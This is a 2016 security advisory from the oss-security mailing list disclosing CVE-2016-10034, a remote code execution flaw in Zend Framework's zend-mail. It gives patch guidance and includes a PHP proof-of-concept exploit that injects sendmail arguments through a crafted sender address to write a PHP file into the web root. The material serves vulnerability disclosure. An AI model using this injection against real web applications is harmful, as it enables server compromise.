Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 30 Dec 2016 14:02:07 -0200
From: Dawid Golunski <dawid@...alhackers.com>
To: oss-security@...ts.openwall.com
Subject: Zend Framework (zend-mail) < 2.4.11 Remote Code Execution (CVE-2016-10034)

Zend Framework / zend-mail < 2.4.11    Remote Code Execution (CVE-2016-10034)
zend-mail < 2.7.2

Discovered by Dawid Golunski (@...id_golunski)
https://legalhackers.com

Desc:
An independent research uncovered a critical vulnerability in zend-mail, a
Zend Framework's component that could potentially be used by (unauthenticated)
remote attackers to achieve remote arbitrary code execution in the context
of the web server user and remotely compromise the target web application.

To exploit the vulnerability an attacker could target common website
components such as contact/feedback forms, registration forms, password
email resets and others that send out emails with the help of a vulnerable
version of the zend-mail class.

The latest full advisory / PoC exploit at:

http://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html

Video / PoC:

https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html

For updates, follow:

https://twitter.com/dawid_golunski


--
Regards,
Dawid Golunski
https://legalhackers.com
t: @dawid_golunski






    __                     __   __  __           __                 
   / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
  / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
 / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  ) 
/_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/  
           /____/                                                   




=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com

- CVE-2016-10034
- Release date:  30.12.2016
- Last revision: 30.12.2016
- Revision 1.0
- Severity: Critical
=============================================


I. VULNERABILITY
-------------------------

Zend Framework < 2.4.11    Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11 
zend-mail < 2.7.2 


II. BACKGROUND
-------------------------


"Zend Framework is a collection of professional PHP packages with more than 95
million installations. It can be used to develop web applications and 
services using PHP 5.6+, and provides 100% object-oriented code using a broad 
spectrum of language features.

Zend Framework 3 evolved from both Zend Framework 2 and 1; cumulatively, 
the previous versions were downloaded more than 15 million times.

The principal sponsor of Zend Framework is Zend, a Rogue Wave Company, but 
many others have contributed components or significant features to the 
framework. Companies such as Google, Microsoft, and StrikeIron have 
partnered with Zend to provide interfaces to web services and other 
technologies they wish to make available to ZF developers."

https://framework.zend.com/about

https://github.com/zendframework/zendframework

III. INTRODUCTION
-------------------------

An independent research uncovered a critical vulnerability in zend-mail, a 
Zend Framework's component that could potentially be used by (unauthenticated)
remote attackers to achieve remote arbitrary code execution in the context 
of the web server user and remotely compromise the target web application.

To exploit the vulnerability an attacker could target common website
components such as contact/feedback forms, registration forms, password
email resets and others that send out emails with the help of a vulnerable
version of the zend-mail class.

Note: This advisory is limited.
Remaining attack vectors/exploits will be disclosed at a later date to allow
more time for patching.

IV. DESCRIPTION
-------------------------

zend-mail component of Zend Framework, suffers from the same vulnerability as 
the ones disclosed in PHPMailer and SwiftMailer:

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html

If a web application based on Zend Framework passes an untrusted input to 
setFrom() function of the zend-mail's Sendmail transport, an attacker could
inject additional parameters to Sendmail program.

By injecting an extra sequence of \" after the first argument, the following email:

"Attacker \" -Param2 -Param3"@...t.com

when passed to zend-mail's Sendmail transport (and eventually to mail()) function 
would cause sendmail to execute with:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker\]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@...t.com]


Which as can be seen would inject additional parameters of 4 & 5 to sendmail.


Attackers can exploit this to achieve code execution as shown in the PoC
below.



V. PROOF OF CONCEPT EXPLOIT
-------------------------

<?php
 
/*
 
Zend Framework < 2.4.11    Remote Code Execution (CVE-2016-10034)
zend-mail < 2.4.11 
zend-mail < 2.7.2 
 
Discovered/Coded by:
 
Dawid Golunski
https://legalhackers.com
 
Full Advisory URL:
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html

Video PoC
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html



Follow the feed for updates:

https://twitter.com/dawid_golunski

 
A simple PoC (working on Sendmail MTA)
 
It will inject the following parameters to sendmail command:
 
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker\]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@...il.com]



which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.

The resulting file will contain the payload passed in the body of the msg:
 
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<< 
09607 <<< <?php phpinfo(); ?>
09607 <<< 
09607 <<< 
09607 <<< 
 
 
See the full advisory URL for the exploit details.
 
*/
 
 
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender/body fields
 
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@...il.com';
// encoded phpinfo() php code
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");



// ------------------
 
// mail() param injection via the vulnerability in zend-mail


chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';

Zend\Loader\AutoloaderFactory::factory(array(
        'Zend\Loader\StandardAutoloader' => array(
                'autoregister_zf' => true
        )
));

Zend\Mvc\Application::init(require 'config/application.php')->run();

$message        = new \Zend\Mail\Message();

$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@...alhost', 'Support');
$message->setSubject('Zend PoC');

$transport  = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);





~~~~~~~~~~~

Video PoC:
~~~~~~~~~~~~~

https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html



VI. BUSINESS IMPACT
-------------------------

A successful exploitation could let remote attackers to gain access to 
the target server in the context of the web server account which could
lead to a full compromise of the web application.

 
VII. SYSTEMS AFFECTED
-------------------------

The patch resolving the vulnerability is available in:

zend-mail, starting in version 2.7.2
zend-mail, 2.4.11
Zend Framework, 2.4.11


VIII. SOLUTION / VENDOR RESPONSE
-------------------------

Update to the latest versions that contain the patch.

https://framework.zend.com/security/advisory/ZF2016-04


IX. REFERENCES
-------------------------

https://legalhackers.com

This / CVE-2016-10034 advisory URL:
https://legalhackers.com/advisories/ZendFramework-Exploit-ZendMail-Remote-Code-Exec-CVE-2016-10034-Vuln.html

Video PoC:
https://legalhackers.com/videos/ZendFramework-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10034-PoC.html

Exploit code:
The simple PoC shown above is available here:
https://legalhackers.com/exploits/CVE-2016-10034/zend-mail_PoC_RCE_Exploit.txt

Other exploits with other attack vectors will be disclosed at a later date to 
allow more time for patching.

CVE-2016-10034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10034

Vendor site:
https://framework.zend.com


Related vulnerabilities (found in PHPMailer & SwiftMailer):

https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html


X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com

https://legalhackers.com


Thanks to Beyond Security's SSD program for help with the disclosure to the vendor.
 
XI. REVISION HISTORY
-------------------------

30.12.2016 - Limited advisory released
 

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.





Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ